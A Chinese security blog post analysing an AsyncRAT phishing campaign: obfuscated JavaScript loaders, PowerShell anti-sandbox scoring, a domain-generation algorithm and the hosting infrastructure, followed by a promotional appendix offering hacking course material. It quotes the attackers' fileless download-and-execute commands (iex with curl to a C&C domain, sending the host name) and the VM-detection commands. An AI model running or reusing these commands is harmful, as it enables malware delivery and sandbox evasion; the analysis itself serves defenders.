AsyncRAT 攻击变化新动向

研究人员发现了向毫无防备的受害者投递 AsyncRAT 的攻击行动。在至少 11 个月的时间里,攻击者致力于通过嵌入网络钓鱼页面的 JavaScript 脚本来投递 AsyncRAT 木马。切换了 100 余个域名与三百多个样本文件后,攻击者的攻击模式始终如一。

这些受害者都经过精心挑选,有一些与美国关键基础设施有关。新的攻击基础设施跟踪表明,该攻击行动仍然活跃。

技术分析

AsyncRAT 是 2019 年发布的开源远控木马,源码在 GitHub 上可见。由于 AsyncRAT 免费且开源,使其成为了攻击者最常用的远控木马之一。其典型功能为:按键记录、横向平移与载荷投递等。

由于代码开源,许多攻击组织都基于开源代码进行定制化开发。根据趋势科技报道,甚至连 APT 组织 Earth Berberoka 也使用 AsyncRAT。

九月初,分析人员发现针对某些公司特定个人的网络钓鱼邮件激增。通过附件诱导受害者下载高度混淆的 JavaScript 代码,拉取后续的 PowerShell 脚本与 AsyncRAT 样本文件。基于代码相似,分析人员发现了更多的样本文件,最早的样本在 2023 年 2 月就出现了。

1704725910_659c0d9648de69518e532.png!small?1704725910802

每月发现样本文件数

攻击链分为多个阶段,攻击者在部署 AsyncRAT 前会检查是否在沙盒中,并且多个阶段都使用了高强度的混淆。

1704725924_659c0da456170a1698851.png!small?1704725924958

感染链

JavaScript 代码通过恶意钓鱼网页投递给目标受害者。JS 代码中包含被注释掉的长字符串,文本由随机单词构成,其中 Melville、church、chapter 和 scottish 是重复次数最多的单词。有分析人员认为,这是类似梵文的内容。各种样本都具有不同的 TTP 来投递最终载荷,可能是不同的攻击者发起的攻击。

脚本代码经过高度混淆,多个函数嵌套避免直接出现可检测的命令。C&C 的 URL 地址也通过十进制方式进行了混淆。想要解密 URL,必须减去一个常量值再将数字转换为 ASCII 字符串。例如,数组(102 131 138 138 141 62 117 141 144 138 130 63)减去 30 再转换为 ASCII 后对应为字符串 Hello World!。

1704725950_659c0dbe1e5ba5e1a3206.png!small?1704725950966

部分代码

该文件最终执行命令 conhost --headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=),其使用的 C&C 域名与 URL 进场更新,很难进行检测。

除了经常更换 C&C 域名与 URL 外,攻击者还尝试为每个受害者生成全新的 Loader。新样本文件使用随机的变量名,使得检测技术难以固定下来。

发出 GET 请求后,C&C 服务器响应脚本代码。代码中包含 base64 编码的数据与解码代码。解码后与脚本中硬编码的密钥进行异或,使用 Gunzip 进行解压缩并复制到内存中。启动 PowerShell 以无文件形式执行恶意代码,所有代码都经过高度混淆以逃避检测。

经过一系列的解码、解密与解压后,脚本命令可以总结为 iex(curl -useb "http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex")。其中,$env:computername 是失陷主机的主机名,$wiqnfex 是一个表示失陷主机是虚拟机或沙盒概率的 12 位的数字。

反沙盒指标的计算逻辑是:

  1. 执行命令 Get-MpComputerStatus | Select -ExpandProperty "IsVirtualMachine" 获取 IsVirtualMachine 的值,预期的输出有三种(True、False、3)
  2. 执行命令 Get-WmiObject Win32_VideoController | Select-Object AdapterDACType | Out-String 获取数模转换器芯片名称或标识符,预期的输出有三种(Intel or SeaBIOS、Internal or Integrated、VMware or Bochs)
  3. 执行命令 Get-WmiObject -Namespace root\wmi -Query 'SELECT * FROM MSSmBios_RawSMBiosTables' | Select-Object Size 检索 SMBIOS 数据,预期的输出有三种(300-1000之间、1000-12000之间、13000-122442之间)

三个命令的每种结果组合起来,就会计算得出最后的结果:

命令
1a83686513507
1b58100085349
1c19309572834
2a30122468073
2b4677137650
2c45069878512
3a58812154367
3b123290835
3c70692379937
Constant2803759539

1b 是不是虚拟机,2c 则是虚拟机。虚拟机的值明显要大于不是虚拟机的值。C&C 服务器可能是通过码表或者值的大小范围来进行判断的。研究人员并没有通过暴力尝试穷举所有有效的响应,但这种反沙盒技术确实能够逃避许多沙盒的检测。

当 C&C 服务器收到错误的值,要么将请求重定向到 Google,要么返回与之前类似的脚本。该脚本请求部署在 temp.sh 上的 Payload,经过观察该 URL 链接都是一致不变的。每个新上传的文件,都会重新使用一个新的随机 URL,但攻击者并不关心该文件能否投递到受害者处。

1704726076_659c0e3c26b60ff7a421b.png!small?1704726077944

脚本文件代码

有的杀软将该样本文件判断为 AsyncRAT,但其实不是。反编译后可以发现,该文件只是一个高仿 AsyncRAT 的诱饵文件。程序名为 DecoyClient,且未进行加密。样本文件中也不包含 C&C 服务器,回传数据中的字符串也有对应类似的俄语单词。

1704726099_659c0e5320ef35a870396.png!small?1704726100778

反编译代码

如果沙盒校验通过,就会响应带有下一个域名和 URL 的脚本,从而获取真正的 AsyncRAT 样本文件。

网络基础设施

攻击者为样本文件进行了重度混淆,使得其难以进行检测。但网络侧的基础设施具备一些共同的特征,例如已发现的域名 sduyvzep[.]top、orivzije[.]top 和 zpeifujz[.]top 遵循如下结构:

  • 顶级域名为 top
  • 使用八个随机字母数字字符
  • 注册商为 Nicenic.net, Inc
  • 注册在南非
  • 在使用前几天创建

以 sduyvzep[.]top 为例,如下所示:

1704726125_659c0e6dae5296e0ebf54.png!small?1704726126487

sduyvzep[.]top 域名信息

通过该类特征,可以发现新的攻击基础设施。脚本代码中包含根据当前日期计算域名的逻辑,这样就可以根据时间的推移自动更换 C&C 域名。

1704726138_659c0e7a982d68fda0637.png!small?1704726139489

DGA 计算逻辑

攻击者使用的 DGA 算法会利用日期生成种子并对其进行修改,确保每七天会生成一个新域名,生成日就在周天。种子选取从 a 到 n 的 15 个字母来生成域名。种子中的其他变量(2023 与 6542)用于进行域名模式的变更。

例如,2023 年 12 月后会出现的域名为:

  • 12 月 10 日至 16 日:leeegfhihnjflcl[.]top
  • 12 月 17 日至 23 日:hlbibfkimfelcja[.]top
  • 12 月 24 日至 30 日:dfmnkggnidkadgcd[.]top
  • 1 月 1 日至 7 日:cibgbgfjcmlbmcd[.]top
  • 1 月 8 日至 14 日:mcmlkgijhdghcjg[.]top
  • 1 月 15 日至 21 日:ijjbfhkjmicnhcj[.]top
  • 1 月 22 日至 28 日:edggnhnjdnmfljm[.]top

根据固定的域名特征,可以发现历史的样本文件与未来的基础设施。除了注册者信息的特征,ASN 也有着明显的特征。样本文件中硬编码的域名都绑定在 BitLaunch 上,而 DGA 域名绑定在 DigitalOcean 上。

1704726154_659c0e8a13b335ffc5140.png!small?1704726155258

BitLaunch 官网

BitLaunch 并不出名,其 ASN 为 399629,该公司允许使用比特币、以太坊或莱特币等加密货币付款。这种商业模式吸引了犯罪分子,利用加密货币的匿名性保持隐蔽。此外,BitLaunch 还可用作 DigitalOcean、Vultr 或 linode 主机的桥梁。最便宜的选择是使用 BitLaunch 进行托管,但另一种选择是允许用户使用加密货币付款并在更可靠的 ASN 中进行托管。

绑定在 DigitalOcean 上的 DGA 域名,默认会显示 Welcome to the BitLaunch LEMP app. Log in to your server to configure your LEMP installation。这可能表明,虽然域名绑定在 DigitalOcean 上,但攻击者可能是通过 BitLaunch 付费的。

1704726175_659c0e9f954989459499d.png!small?1704726176350

域名情况

总结

攻击者在 2023 年,使用了数百个不同的样本文件来感染受害者并且尽量保持了隐蔽。攻击者非常重视定制化,对样本不断进行混淆与修改。

题外话

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

  • 2023届全国高校毕业生预计达到1158万人,就业形势严峻;
  • 国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

 “没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。 

网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

 2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。

 行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

 (都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

  因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

  

  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值